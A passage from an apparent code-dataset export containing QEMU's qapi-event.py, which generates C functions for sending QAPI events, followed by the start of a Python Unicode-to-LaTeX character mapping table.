text
stringlengths 12
1.05M
| repo_name
stringlengths 5
86
| path
stringlengths 4
191
| language
stringclasses 1
value | license
stringclasses 15
values | size
int32 12
1.05M
| keyword
listlengths 1
23
| text_hash
stringlengths 64
64
|
|---|---|---|---|---|---|---|---|
#
# QAPI event generator
#
# Copyright (c) 2014 Wenchao Xia
# Copyright (c) 2015-2016 Red Hat Inc.
#
# Authors:
# Wenchao Xia <wenchaoqemu@gmail.com>
# Markus Armbruster <armbru@redhat.com>
#
# This work is licensed under the terms of the GNU GPL, version 2.
# See the COPYING file in the top-level directory.
from qapi import *
def gen_event_send_proto(name, arg_type):
    """Return the C prototype string for an event's qapi_event_send_* function."""
    func = c_name(name.lower())
    params = gen_params(arg_type, 'Error **errp')
    return 'void qapi_event_send_%(c_name)s(%(param)s)' % {
        'c_name': func,
        'param': params}
def gen_event_send_decl(name, arg_type):
    """Return the extern declaration line for an event's send function."""
    proto = gen_event_send_proto(name, arg_type)
    return mcgen('''
%(proto)s;
''',
                 proto=proto)
def gen_event_send(name, arg_type):
    """Generate the C definition of one event's qapi_event_send_* function.

    The generated function builds the event QDict via
    qmp_event_build_dict(), serializes the event arguments (if any) into
    a "data" member with a QMP output visitor, and hands the result to
    the emitter returned by qmp_event_get_func_emit().
    """
    ret = mcgen('''
%(proto)s
{
QDict *qmp;
Error *err = NULL;
QMPEventFuncEmit emit;
''',
                proto=gen_event_send_proto(name, arg_type))

    # Visitor locals are only declared when the event carries arguments.
    if arg_type and arg_type.members:
        ret += mcgen('''
QmpOutputVisitor *qov;
Visitor *v;
QObject *obj;
''')

    # No registered emitter means nothing to do; bail out early.
    ret += mcgen('''
emit = qmp_event_get_func_emit();
if (!emit) {
return;
}
qmp = qmp_event_build_dict("%(name)s");
''',
                 name=name)

    if arg_type and arg_type.members:
        # Visit each argument into a QObject and attach it as "data".
        ret += mcgen('''
qov = qmp_output_visitor_new();
v = qmp_output_get_visitor(qov);
visit_start_struct(v, "%(name)s", NULL, 0, &err);
''',
                     name=name)
        ret += gen_err_check()
        ret += gen_visit_fields(arg_type.members, need_cast=True,
                                label='out_obj')
        ret += mcgen('''
out_obj:
visit_end_struct(v, err ? NULL : &err);
if (err) {
goto out;
}
obj = qmp_output_get_qobject(qov);
g_assert(obj);
qdict_put_obj(qmp, "data", obj);
''')

    ret += mcgen('''
emit(%(c_enum)s, qmp, &err);
''',
                 c_enum=c_enum_const(event_enum_name, name))

    # The out: label / visitor cleanup only exist when a visitor was used.
    if arg_type and arg_type.members:
        ret += mcgen('''
out:
qmp_output_visitor_cleanup(qov);
''')
    ret += mcgen('''
error_propagate(errp, err);
QDECREF(qmp);
}
''')
    return ret
class QAPISchemaGenEventVisitor(QAPISchemaVisitor):
    """Schema visitor accumulating event declarations and definitions.

    After a schema walk, ``decl`` holds the header-file text and ``defn``
    the C-file text for every visited event, plus the event enum.
    """

    def __init__(self):
        self.decl = self.defn = None
        self._event_names = None

    def visit_begin(self, schema):
        # Reset accumulators at the start of each walk.
        self.decl = ''
        self.defn = ''
        self._event_names = []

    def visit_end(self):
        # Emit the QAPIEvent enum and its lookup table last, once every
        # event name has been collected.
        names = self._event_names
        self.decl += gen_enum(event_enum_name, names)
        self.defn += gen_enum_lookup(event_enum_name, names)
        self._event_names = None

    def visit_event(self, name, info, arg_type):
        decl = gen_event_send_decl(name, arg_type)
        defn = gen_event_send(name, arg_type)
        self.decl += decl
        self.defn += defn
        self._event_names.append(name)
# Script entry: parse the generator command line shared by all QAPI
# generators (input schema, output dir, which files to emit, C-name prefix).
(input_file, output_dir, do_c, do_h, prefix, dummy) = parse_command_line()

# License header written at the top of the generated .c file.
c_comment = '''
/*
* schema-defined QAPI event functions
*
* Copyright (c) 2014 Wenchao Xia
*
* Authors:
* Wenchao Xia <wenchaoqemu@gmail.com>
*
* This work is licensed under the terms of the GNU LGPL, version 2.1 or later.
* See the COPYING.LIB file in the top-level directory.
*
*/
'''
# License header written at the top of the generated .h file.
h_comment = '''
/*
* schema-defined QAPI event functions
*
* Copyright (c) 2014 Wenchao Xia
*
* Authors:
* Wenchao Xia <wenchaoqemu@gmail.com>
*
* This work is licensed under the terms of the GNU LGPL, version 2.1 or later.
* See the COPYING.LIB file in the top-level directory.
*
*/
'''
# Open qapi-event.c / qapi-event.h with the license headers pre-written.
(fdef, fdecl) = open_output(output_dir, do_c, do_h, prefix,
                            'qapi-event.c', 'qapi-event.h',
                            c_comment, h_comment)

# Fixed include set for the generated C source.
fdef.write(mcgen('''
#include "qemu/osdep.h"
#include "qemu-common.h"
#include "%(prefix)sqapi-event.h"
#include "%(prefix)sqapi-visit.h"
#include "qapi/qmp-output-visitor.h"
#include "qapi/qmp-event.h"
''',
                 prefix=prefix))

# Fixed include set for the generated header.
fdecl.write(mcgen('''
#include "qapi/error.h"
#include "qapi/qmp/qdict.h"
#include "%(prefix)sqapi-types.h"
''',
                  prefix=prefix))

# C name of the generated event enum (prefix + "QAPIEvent"), used by
# gen_event_send() and the visitor below.
event_enum_name = c_name(prefix + "QAPIEvent", protect=False)

# Walk the schema, accumulating declarations and definitions, then flush
# them to the output files.
schema = QAPISchema(input_file)
gen = QAPISchemaGenEventVisitor()
schema.visit(gen)
fdef.write(gen.defn)
fdecl.write(gen.decl)

close_output(fdef, fdecl)
|
SPICE/qemu
|
scripts/qapi-event.py
|
Python
|
gpl-2.0
| 4,236
|
[
"VisIt"
] |
d7352dad8965dcf7352ba20e204a9a8b60401b194965d7e71340957b3b2b5008
|
# -*- coding: utf-8 -*-
# Small ad-hoc table mapping a handful of escape-sequence keys to their
# LaTeX replacements; one entry per line for readability.
symbols = {
    '\xc2\xb0': "$^{\\circ}$",
    u"\\xb2": "^2",
    u"\\xb3": "^3",
    u"\\xb1": "$\\pm$",
    '\\xe2\\x89\\x89': "\\neq",
}
# http://www.johndcook.com/unicode_latex.html
# Based on John D. Cook's unicode-to-latex javascript
#
unicode_to_latex_dict = {
u"\u0023":"\\#",
u"\u0024":"\\textdollar",
u"\u0025":"\\%",
u"\u0026":"\\&",
u"\u0027":"\\textquotesingle",
u"\u002A":"\\ast",
u"\u005C":"\\textbackslash",
u"\u005E":"\\^{}",
u"\u005F":"\\_",
u"\u0060":"\\textasciigrave",
u"\u007B":"\\lbrace",
u"\u007C":"\\vert",
u"\u007D":"\\rbrace",
u"\u007E":"\\textasciitilde",
u"\u00A1":"\\textexclamdown",
u"\u00A2":"\\textcent",
u"\u00A3":"\\textsterling",
u"\u00A4":"\\textcurrency",
u"\u00A5":"\\textyen",
u"\u00A6":"\\textbrokenbar",
u"\u00A7":"\\textsection",
u"\u00A8":"\\textasciidieresis",
u"\u00A9":"\\textcopyright",
u"\u00AA":"\\textordfeminine",
u"\u00AB":"\\guillemotleft",
u"\u00AC":"\\lnot",
u"\u00AD":"\\-",
u"\u00AE":"\\textregistered",
u"\u00AF":"\\textasciimacron",
u"\u00B0":"\\textdegree",
u"\u00B1":"\\pm",
u"\u00B2":"{^2}",
u"\u00B3":"{^3}",
u"\u00B4":"\\textasciiacute",
u"\u00B5":"\\mathrm{\\mu}",
u"\u00B6":"\\textparagraph",
u"\u00B7":"\\cdot",
u"\u00B8":"\\c{}",
u"\u00B9":"{^1}",
u"\u00BA":"\\textordmasculine",
u"\u00BB":"\\guillemotright",
u"\u00BC":"\\textonequarter",
u"\u00BD":"\\textonehalf",
u"\u00BE":"\\textthreequarters",
u"\u00BF":"\\textquestiondown",
u"\u00C0":"\\`{A}",
u"\u00C1":"\\\'{A}",
u"\u00C2":"\\^{A}",
u"\u00C3":"\\~{A}",
u"\u00C4":"\\\"{A}",
u"\u00C5":"\\AA",
u"\u00C6":"\\AE",
u"\u00C7":"\\c{C}",
u"\u00C8":"\\`{E}",
u"\u00C9":"\\\'{E}",
u"\u00CA":"\\^{E}",
u"\u00CB":"\\\"{E}",
u"\u00CC":"\\`{I}",
u"\u00CD":"\\\'{I}",
u"\u00CE":"\\^{I}",
u"\u00CF":"\\\"{I}",
u"\u00D0":"\\DH",
u"\u00D1":"\\~{N}",
u"\u00D2":"\\`{O}",
u"\u00D3":"\\\'{O}",
u"\u00D4":"\\^{O}",
u"\u00D5":"\\~{O}",
u"\u00D6":"\\\"{O}",
u"\u00D7":"\\texttimes",
u"\u00D8":"\\O",
u"\u00D9":"\\`{U}",
u"\u00DA":"\\\'{U}",
u"\u00DB":"\\^{U}",
u"\u00DC":"\\\"{U}",
u"\u00DD":"\\\'{Y}",
u"\u00DE":"\\TH",
u"\u00DF":"\\ss",
u"\u00E0":"\\`{a}",
u"\u00E1":"\\\'{a}",
u"\u00E2":"\\^{a}",
u"\u00E3":"\\~{a}",
u"\u00E4":"\\\"{a}",
u"\u00E5":"\\aa",
u"\u00E6":"\\ae",
u"\u00E7":"\\c{c}",
u"\u00E8":"\\`{e}",
u"\u00E9":"\\\'{e}",
u"\u00EA":"\\^{e}",
u"\u00EB":"\\\"{e}",
u"\u00EC":"\\`{\\i}",
u"\u00ED":"\\\'{\\i}",
u"\u00EE":"\\^{\\i}",
u"\u00EF":"\\\"{\\i}",
u"\u00F0":"\\dh",
u"\u00F1":"\\~{n}",
u"\u00F2":"\\`{o}",
u"\u00F3":"\\\'{o}",
u"\u00F4":"\\^{o}",
u"\u00F5":"\\~{o}",
u"\u00F6":"\\\"{o}",
u"\u00F7":"\\div",
u"\u00F8":"\\o",
u"\u00F9":"\\`{u}",
u"\u00FA":"\\\'{u}",
u"\u00FB":"\\^{u}",
u"\u00FC":"\\\"{u}",
u"\u00FD":"\\\'{y}",
u"\u00FE":"\\th",
u"\u00FF":"\\\"{y}",
u"\u0100":"\\={A}",
u"\u0101":"\\={a}",
u"\u0102":"\\u{A}",
u"\u0103":"\\u{a}",
u"\u0104":"\\k{A}",
u"\u0105":"\\k{a}",
u"\u0106":"\\\'{C}",
u"\u0107":"\\\'{c}",
u"\u0108":"\\^{C}",
u"\u0109":"\\^{c}",
u"\u010A":"\\.{C}",
u"\u010B":"\\.{c}",
u"\u010C":"\\v{C}",
u"\u010D":"\\v{c}",
u"\u010E":"\\v{D}",
u"\u010F":"\\v{d}",
u"\u0110":"\\DJ",
u"\u0111":"\\dj",
u"\u0112":"\\={E}",
u"\u0113":"\\={e}",
u"\u0114":"\\u{E}",
u"\u0115":"\\u{e}",
u"\u0116":"\\.{E}",
u"\u0117":"\\.{e}",
u"\u0118":"\\k{E}",
u"\u0119":"\\k{e}",
u"\u011A":"\\v{E}",
u"\u011B":"\\v{e}",
u"\u011C":"\\^{G}",
u"\u011D":"\\^{g}",
u"\u011E":"\\u{G}",
u"\u011F":"\\u{g}",
u"\u0120":"\\.{G}",
u"\u0121":"\\.{g}",
u"\u0122":"\\c{G}",
u"\u0123":"\\c{g}",
u"\u0124":"\\^{H}",
u"\u0125":"\\^{h}",
u"\u0126":"{\\fontencoding{LELA}\\selectfont\\char40}",
u"\u0127":"\\Elzxh",
u"\u0128":"\\~{I}",
u"\u0129":"\\~{\\i}",
u"\u012A":"\\={I}",
u"\u012B":"\\={\\i}",
u"\u012C":"\\u{I}",
u"\u012D":"\\u{\\i}",
u"\u012E":"\\k{I}",
u"\u012F":"\\k{i}",
u"\u0130":"\\.{I}",
u"\u0131":"\\i",
u"\u0132":"IJ",
u"\u0133":"ij",
u"\u0134":"\\^{J}",
u"\u0135":"\\^{\\j}",
u"\u0136":"\\c{K}",
u"\u0137":"\\c{k}",
u"\u0138":"{\\fontencoding{LELA}\\selectfont\\char91}",
u"\u0139":"\\\'{L}",
u"\u013A":"\\\'{l}",
u"\u013B":"\\c{L}",
u"\u013C":"\\c{l}",
u"\u013D":"\\v{L}",
u"\u013E":"\\v{l}",
u"\u013F":"{\\fontencoding{LELA}\\selectfont\\char201}",
u"\u0140":"{\\fontencoding{LELA}\\selectfont\\char202}",
u"\u0141":"\\L",
u"\u0142":"\\l",
u"\u0143":"\\\'{N}",
u"\u0144":"\\\'{n}",
u"\u0145":"\\c{N}",
u"\u0146":"\\c{n}",
u"\u0147":"\\v{N}",
u"\u0148":"\\v{n}",
u"\u0149":"\\'n",
u"\u014A":"\\NG",
u"\u014B":"\\ng",
u"\u014C":"\\={O}",
u"\u014D":"\\={o}",
u"\u014E":"\\u{O}",
u"\u014F":"\\u{o}",
u"\u0150":"\\H{O}",
u"\u0151":"\\H{o}",
u"\u0152":"\\OE",
u"\u0153":"\\oe",
u"\u0154":"\\\'{R}",
u"\u0155":"\\\'{r}",
u"\u0156":"\\c{R}",
u"\u0157":"\\c{r}",
u"\u0158":"\\v{R}",
u"\u0159":"\\v{r}",
u"\u015A":"\\\'{S}",
u"\u015B":"\\\'{s}",
u"\u015C":"\\^{S}",
u"\u015D":"\\^{s}",
u"\u015E":"\\c{S}",
u"\u015F":"\\c{s}",
u"\u0160":"\\v{S}",
u"\u0161":"\\v{s}",
u"\u0162":"\\c{T}",
u"\u0163":"\\c{t}",
u"\u0164":"\\v{T}",
u"\u0165":"\\v{t}",
u"\u0166":"{\\fontencoding{LELA}\\selectfont\\char47}",
u"\u0167":"{\\fontencoding{LELA}\\selectfont\\char63}",
u"\u0168":"\\~{U}",
u"\u0169":"\\~{u}",
u"\u016A":"\\={U}",
u"\u016B":"\\={u}",
u"\u016C":"\\u{U}",
u"\u016D":"\\u{u}",
u"\u016E":"\\r{U}",
u"\u016F":"\\r{u}",
u"\u0170":"\\H{U}",
u"\u0171":"\\H{u}",
u"\u0172":"\\k{U}",
u"\u0173":"\\k{u}",
u"\u0174":"\\^{W}",
u"\u0175":"\\^{w}",
u"\u0176":"\\^{Y}",
u"\u0177":"\\^{y}",
u"\u0178":"\\\"{Y}",
u"\u0179":"\\\'{Z}",
u"\u017A":"\\\'{z}",
u"\u017B":"\\.{Z}",
u"\u017C":"\\.{z}",
u"\u017D":"\\v{Z}",
u"\u017E":"\\v{z}",
u"\u0195":"\\texthvlig",
u"\u019E":"\\textnrleg",
u"\u01AA":"\\eth",
u"\u01BA":"{\\fontencoding{LELA}\\selectfont\\char195}",
u"\u01C2":"\\textdoublepipe",
u"\u01F5":"\\\'{g}",
u"\u0250":"\\Elztrna",
u"\u0252":"\\Elztrnsa",
u"\u0254":"\\Elzopeno",
u"\u0256":"\\Elzrtld",
u"\u0258":"{\\fontencoding{LEIP}\\selectfont\\char61}",
u"\u0259":"\\Elzschwa",
u"\u025B":"\\varepsilon",
u"\u0263":"\\Elzpgamma",
u"\u0264":"\\Elzpbgam",
u"\u0265":"\\Elztrnh",
u"\u026C":"\\Elzbtdl",
u"\u026D":"\\Elzrtll",
u"\u026F":"\\Elztrnm",
u"\u0270":"\\Elztrnmlr",
u"\u0271":"\\Elzltlmr",
u"\u0272":"\\Elzltln",
u"\u0273":"\\Elzrtln",
u"\u0277":"\\Elzclomeg",
u"\u0278":"\\textphi",
u"\u0279":"\\Elztrnr",
u"\u027A":"\\Elztrnrl",
u"\u027B":"\\Elzrttrnr",
u"\u027C":"\\Elzrl",
u"\u027D":"\\Elzrtlr",
u"\u027E":"\\Elzfhr",
u"\u027F":"{\\fontencoding{LEIP}\\selectfont\\char202}",
u"\u0282":"\\Elzrtls",
u"\u0283":"\\Elzesh",
u"\u0287":"\\Elztrnt",
u"\u0288":"\\Elzrtlt",
u"\u028A":"\\Elzpupsil",
u"\u028B":"\\Elzpscrv",
u"\u028C":"\\Elzinvv",
u"\u028D":"\\Elzinvw",
u"\u028E":"\\Elztrny",
u"\u0290":"\\Elzrtlz",
u"\u0292":"\\Elzyogh",
u"\u0294":"\\Elzglst",
u"\u0295":"\\Elzreglst",
u"\u0296":"\\Elzinglst",
u"\u029E":"\\textturnk",
u"\u02A4":"\\Elzdyogh",
u"\u02A7":"\\Elztesh",
u"\u02C7":"\\textasciicaron",
u"\u02C8":"\\Elzverts",
u"\u02CC":"\\Elzverti",
u"\u02D0":"\\Elzlmrk",
u"\u02D1":"\\Elzhlmrk",
u"\u02D2":"\\Elzsbrhr",
u"\u02D3":"\\Elzsblhr",
u"\u02D4":"\\Elzrais",
u"\u02D5":"\\Elzlow",
u"\u02D8":"\\textasciibreve",
u"\u02D9":"\\textperiodcentered",
u"\u02DA":"\\r{}",
u"\u02DB":"\\k{}",
u"\u02DC":"\\texttildelow",
u"\u02DD":"\\H{}",
u"\u02E5":"\\tone{55}",
u"\u02E6":"\\tone{44}",
u"\u02E7":"\\tone{33}",
u"\u02E8":"\\tone{22}",
u"\u02E9":"\\tone{11}",
u"\u0300":"\\`",
u"\u0301":"\\\'",
u"\u0302":"\\^",
u"\u0303":"\\~",
u"\u0304":"\\=",
u"\u0306":"\\u",
u"\u0307":"\\.",
u"\u0308":"\\\"",
u"\u030A":"\\r",
u"\u030B":"\\H",
u"\u030C":"\\v",
u"\u030F":"\\cyrchar\\C",
u"\u0311":"{\\fontencoding{LECO}\\selectfont\\char177}",
u"\u0318":"{\\fontencoding{LECO}\\selectfont\\char184}",
u"\u0319":"{\\fontencoding{LECO}\\selectfont\\char185}",
u"\u0321":"\\Elzpalh",
u"\u0322":"\\Elzrh",
u"\u0327":"\\c",
u"\u0328":"\\k",
u"\u032A":"\\Elzsbbrg",
u"\u032B":"{\\fontencoding{LECO}\\selectfont\\char203}",
u"\u032F":"{\\fontencoding{LECO}\\selectfont\\char207}",
u"\u0335":"\\Elzxl",
u"\u0336":"\\Elzbar",
u"\u0337":"{\\fontencoding{LECO}\\selectfont\\char215}",
u"\u0338":"{\\fontencoding{LECO}\\selectfont\\char216}",
u"\u033A":"{\\fontencoding{LECO}\\selectfont\\char218}",
u"\u033B":"{\\fontencoding{LECO}\\selectfont\\char219}",
u"\u033C":"{\\fontencoding{LECO}\\selectfont\\char220}",
u"\u033D":"{\\fontencoding{LECO}\\selectfont\\char221}",
u"\u0361":"{\\fontencoding{LECO}\\selectfont\\char225}",
u"\u0386":"\\\'{A}",
u"\u0388":"\\\'{E}",
u"\u0389":"\\\'{H}",
u"\u038A":"\\\'{}{I}",
u"\u038C":"\\\'{}O",
u"\u038E":"\\mathrm{\\'Y}",
u"\u038F":"\\mathrm{\\'\\Omega}",
u"\u0390":"\\acute{\\ddot{\\iota}}",
u"\u0391":"\\Alpha",
u"\u0392":"\\Beta",
u"\u0393":"\\Gamma",
u"\u0394":"\\Delta",
u"\u0395":"\\Epsilon",
u"\u0396":"\\Zeta",
u"\u0397":"\\Eta",
u"\u0398":"\\Theta",
u"\u0399":"\\Iota",
u"\u039A":"\\Kappa",
u"\u039B":"\\Lambda",
u"\u039E":"\\Xi",
u"\u03A0":"\\Pi",
u"\u03A1":"\\Rho",
u"\u03A3":"\\Sigma",
u"\u03A4":"\\Tau",
u"\u03A5":"\\Upsilon",
u"\u03A6":"\\Phi",
u"\u03A7":"\\Chi",
u"\u03A8":"\\Psi",
u"\u03A9":"\\Omega",
u"\u03AA":"\\mathrm{\\ddot{I}}",
u"\u03AB":"\\mathrm{\\ddot{Y}}",
u"\u03AC":"\\\'{$\\alpha$}",
u"\u03AD":"\\acute{\\epsilon}",
u"\u03AE":"\\acute{\\eta}",
u"\u03AF":"\\acute{\\iota}",
u"\u03B0":"\\acute{\\ddot{\\upsilon}}",
u"\u03B1":"\\alpha",
u"\u03B2":"\\beta",
u"\u03B3":"\\gamma",
u"\u03B4":"\\delta",
u"\u03B5":"\\epsilon",
u"\u03B6":"\\zeta",
u"\u03B7":"\\eta",
u"\u03B8":"\\texttheta",
u"\u03B9":"\\iota",
u"\u03BA":"\\kappa",
u"\u03BB":"\\lambda",
u"\u03BC":"\\mu",
u"\u03BD":"\\nu",
u"\u03BE":"\\xi",
u"\u03C0":"\\pi",
u"\u03C1":"\\rho",
u"\u03C2":"\\varsigma",
u"\u03C3":"\\sigma",
u"\u03C4":"\\tau",
u"\u03C5":"\\upsilon",
u"\u03C6":"\\varphi",
u"\u03C7":"\\chi",
u"\u03C8":"\\psi",
u"\u03C9":"\\omega",
u"\u03CA":"\\ddot{\\iota}",
u"\u03CB":"\\ddot{\\upsilon}",
u"\u03CC":"\\\'{o}",
u"\u03CD":"\\acute{\\upsilon}",
u"\u03CE":"\\acute{\\omega}",
u"\u03D0":"\\Pisymbol{ppi022}{87}",
u"\u03D1":"\\textvartheta",
u"\u03D2":"\\Upsilon",
u"\u03D5":"\\phi",
u"\u03D6":"\\varpi",
u"\u03DA":"\\Stigma",
u"\u03DC":"\\Digamma",
u"\u03DD":"\\digamma",
u"\u03DE":"\\Koppa",
u"\u03E0":"\\Sampi",
u"\u03F0":"\\varkappa",
u"\u03F1":"\\varrho",
u"\u03F4":"\\textTheta",
u"\u03F6":"\\backepsilon",
u"\u0401":"\\cyrchar\\CYRYO",
u"\u0402":"\\cyrchar\\CYRDJE",
u"\u0403":"\\cyrchar{\\\'\\CYRG}",
u"\u0404":"\\cyrchar\\CYRIE",
u"\u0405":"\\cyrchar\\CYRDZE",
u"\u0406":"\\cyrchar\\CYRII",
u"\u0407":"\\cyrchar\\CYRYI",
u"\u0408":"\\cyrchar\\CYRJE",
u"\u0409":"\\cyrchar\\CYRLJE",
u"\u040A":"\\cyrchar\\CYRNJE",
u"\u040B":"\\cyrchar\\CYRTSHE",
u"\u040C":"\\cyrchar{\\\'\\CYRK}",
u"\u040E":"\\cyrchar\\CYRUSHRT",
u"\u040F":"\\cyrchar\\CYRDZHE",
u"\u0410":"\\cyrchar\\CYRA",
u"\u0411":"\\cyrchar\\CYRB",
u"\u0412":"\\cyrchar\\CYRV",
u"\u0413":"\\cyrchar\\CYRG",
u"\u0414":"\\cyrchar\\CYRD",
u"\u0415":"\\cyrchar\\CYRE",
u"\u0416":"\\cyrchar\\CYRZH",
u"\u0417":"\\cyrchar\\CYRZ",
u"\u0418":"\\cyrchar\\CYRI",
u"\u0419":"\\cyrchar\\CYRISHRT",
u"\u041A":"\\cyrchar\\CYRK",
u"\u041B":"\\cyrchar\\CYRL",
u"\u041C":"\\cyrchar\\CYRM",
u"\u041D":"\\cyrchar\\CYRN",
u"\u041E":"\\cyrchar\\CYRO",
u"\u041F":"\\cyrchar\\CYRP",
u"\u0420":"\\cyrchar\\CYRR",
u"\u0421":"\\cyrchar\\CYRS",
u"\u0422":"\\cyrchar\\CYRT",
u"\u0423":"\\cyrchar\\CYRU",
u"\u0424":"\\cyrchar\\CYRF",
u"\u0425":"\\cyrchar\\CYRH",
u"\u0426":"\\cyrchar\\CYRC",
u"\u0427":"\\cyrchar\\CYRCH",
u"\u0428":"\\cyrchar\\CYRSH",
u"\u0429":"\\cyrchar\\CYRSHCH",
u"\u042A":"\\cyrchar\\CYRHRDSN",
u"\u042B":"\\cyrchar\\CYRERY",
u"\u042C":"\\cyrchar\\CYRSFTSN",
u"\u042D":"\\cyrchar\\CYREREV",
u"\u042E":"\\cyrchar\\CYRYU",
u"\u042F":"\\cyrchar\\CYRYA",
u"\u0430":"\\cyrchar\\cyra",
u"\u0431":"\\cyrchar\\cyrb",
u"\u0432":"\\cyrchar\\cyrv",
u"\u0433":"\\cyrchar\\cyrg",
u"\u0434":"\\cyrchar\\cyrd",
u"\u0435":"\\cyrchar\\cyre",
u"\u0436":"\\cyrchar\\cyrzh",
u"\u0437":"\\cyrchar\\cyrz",
u"\u0438":"\\cyrchar\\cyri",
u"\u0439":"\\cyrchar\\cyrishrt",
u"\u043A":"\\cyrchar\\cyrk",
u"\u043B":"\\cyrchar\\cyrl",
u"\u043C":"\\cyrchar\\cyrm",
u"\u043D":"\\cyrchar\\cyrn",
u"\u043E":"\\cyrchar\\cyro",
u"\u043F":"\\cyrchar\\cyrp",
u"\u0440":"\\cyrchar\\cyrr",
u"\u0441":"\\cyrchar\\cyrs",
u"\u0442":"\\cyrchar\\cyrt",
u"\u0443":"\\cyrchar\\cyru",
u"\u0444":"\\cyrchar\\cyrf",
u"\u0445":"\\cyrchar\\cyrh",
u"\u0446":"\\cyrchar\\cyrc",
u"\u0447":"\\cyrchar\\cyrch",
u"\u0448":"\\cyrchar\\cyrsh",
u"\u0449":"\\cyrchar\\cyrshch",
u"\u044A":"\\cyrchar\\cyrhrdsn",
u"\u044B":"\\cyrchar\\cyrery",
u"\u044C":"\\cyrchar\\cyrsftsn",
u"\u044D":"\\cyrchar\\cyrerev",
u"\u044E":"\\cyrchar\\cyryu",
u"\u044F":"\\cyrchar\\cyrya",
u"\u0451":"\\cyrchar\\cyryo",
u"\u0452":"\\cyrchar\\cyrdje",
u"\u0453":"\\cyrchar{\\\'\\cyrg}",
u"\u0454":"\\cyrchar\\cyrie",
u"\u0455":"\\cyrchar\\cyrdze",
u"\u0456":"\\cyrchar\\cyrii",
u"\u0457":"\\cyrchar\\cyryi",
u"\u0458":"\\cyrchar\\cyrje",
u"\u0459":"\\cyrchar\\cyrlje",
u"\u045A":"\\cyrchar\\cyrnje",
u"\u045B":"\\cyrchar\\cyrtshe",
u"\u045C":"\\cyrchar{\\\'\\cyrk}",
u"\u045E":"\\cyrchar\\cyrushrt",
u"\u045F":"\\cyrchar\\cyrdzhe",
u"\u0460":"\\cyrchar\\CYROMEGA",
u"\u0461":"\\cyrchar\\cyromega",
u"\u0462":"\\cyrchar\\CYRYAT",
u"\u0464":"\\cyrchar\\CYRIOTE",
u"\u0465":"\\cyrchar\\cyriote",
u"\u0466":"\\cyrchar\\CYRLYUS",
u"\u0467":"\\cyrchar\\cyrlyus",
u"\u0468":"\\cyrchar\\CYRIOTLYUS",
u"\u0469":"\\cyrchar\\cyriotlyus",
u"\u046A":"\\cyrchar\\CYRBYUS",
u"\u046C":"\\cyrchar\\CYRIOTBYUS",
u"\u046D":"\\cyrchar\\cyriotbyus",
u"\u046E":"\\cyrchar\\CYRKSI",
u"\u046F":"\\cyrchar\\cyrksi",
u"\u0470":"\\cyrchar\\CYRPSI",
u"\u0471":"\\cyrchar\\cyrpsi",
u"\u0472":"\\cyrchar\\CYRFITA",
u"\u0474":"\\cyrchar\\CYRIZH",
u"\u0478":"\\cyrchar\\CYRUK",
u"\u0479":"\\cyrchar\\cyruk",
u"\u047A":"\\cyrchar\\CYROMEGARND",
u"\u047B":"\\cyrchar\\cyromegarnd",
u"\u047C":"\\cyrchar\\CYROMEGATITLO",
u"\u047D":"\\cyrchar\\cyromegatitlo",
u"\u047E":"\\cyrchar\\CYROT",
u"\u047F":"\\cyrchar\\cyrot",
u"\u0480":"\\cyrchar\\CYRKOPPA",
u"\u0481":"\\cyrchar\\cyrkoppa",
u"\u0482":"\\cyrchar\\cyrthousands",
u"\u0488":"\\cyrchar\\cyrhundredthousands",
u"\u0489":"\\cyrchar\\cyrmillions",
u"\u048C":"\\cyrchar\\CYRSEMISFTSN",
u"\u048D":"\\cyrchar\\cyrsemisftsn",
u"\u048E":"\\cyrchar\\CYRRTICK",
u"\u048F":"\\cyrchar\\cyrrtick",
u"\u0490":"\\cyrchar\\CYRGUP",
u"\u0491":"\\cyrchar\\cyrgup",
u"\u0492":"\\cyrchar\\CYRGHCRS",
u"\u0493":"\\cyrchar\\cyrghcrs",
u"\u0494":"\\cyrchar\\CYRGHK",
u"\u0495":"\\cyrchar\\cyrghk",
u"\u0496":"\\cyrchar\\CYRZHDSC",
u"\u0497":"\\cyrchar\\cyrzhdsc",
u"\u0498":"\\cyrchar\\CYRZDSC",
u"\u0499":"\\cyrchar\\cyrzdsc",
u"\u049A":"\\cyrchar\\CYRKDSC",
u"\u049B":"\\cyrchar\\cyrkdsc",
u"\u049C":"\\cyrchar\\CYRKVCRS",
u"\u049D":"\\cyrchar\\cyrkvcrs",
u"\u049E":"\\cyrchar\\CYRKHCRS",
u"\u049F":"\\cyrchar\\cyrkhcrs",
u"\u04A0":"\\cyrchar\\CYRKBEAK",
u"\u04A1":"\\cyrchar\\cyrkbeak",
u"\u04A2":"\\cyrchar\\CYRNDSC",
u"\u04A3":"\\cyrchar\\cyrndsc",
u"\u04A4":"\\cyrchar\\CYRNG",
u"\u04A5":"\\cyrchar\\cyrng",
u"\u04A6":"\\cyrchar\\CYRPHK",
u"\u04A7":"\\cyrchar\\cyrphk",
u"\u04A8":"\\cyrchar\\CYRABHHA",
u"\u04A9":"\\cyrchar\\cyrabhha",
u"\u04AA":"\\cyrchar\\CYRSDSC",
u"\u04AB":"\\cyrchar\\cyrsdsc",
u"\u04AC":"\\cyrchar\\CYRTDSC",
u"\u04AD":"\\cyrchar\\cyrtdsc",
u"\u04AE":"\\cyrchar\\CYRY",
u"\u04AF":"\\cyrchar\\cyry",
u"\u04B0":"\\cyrchar\\CYRYHCRS",
u"\u04B1":"\\cyrchar\\cyryhcrs",
u"\u04B2":"\\cyrchar\\CYRHDSC",
u"\u04B3":"\\cyrchar\\cyrhdsc",
u"\u04B4":"\\cyrchar\\CYRTETSE",
u"\u04B5":"\\cyrchar\\cyrtetse",
u"\u04B6":"\\cyrchar\\CYRCHRDSC",
u"\u04B7":"\\cyrchar\\cyrchrdsc",
u"\u04B8":"\\cyrchar\\CYRCHVCRS",
u"\u04B9":"\\cyrchar\\cyrchvcrs",
u"\u04BA":"\\cyrchar\\CYRSHHA",
u"\u04BB":"\\cyrchar\\cyrshha",
u"\u04BC":"\\cyrchar\\CYRABHCH",
u"\u04BD":"\\cyrchar\\cyrabhch",
u"\u04BE":"\\cyrchar\\CYRABHCHDSC",
u"\u04BF":"\\cyrchar\\cyrabhchdsc",
u"\u04C0":"\\cyrchar\\CYRpalochka",
u"\u04C3":"\\cyrchar\\CYRKHK",
u"\u04C4":"\\cyrchar\\cyrkhk",
u"\u04C7":"\\cyrchar\\CYRNHK",
u"\u04C8":"\\cyrchar\\cyrnhk",
u"\u04CB":"\\cyrchar\\CYRCHLDSC",
u"\u04CC":"\\cyrchar\\cyrchldsc",
u"\u04D4":"\\cyrchar\\CYRAE",
u"\u04D5":"\\cyrchar\\cyrae",
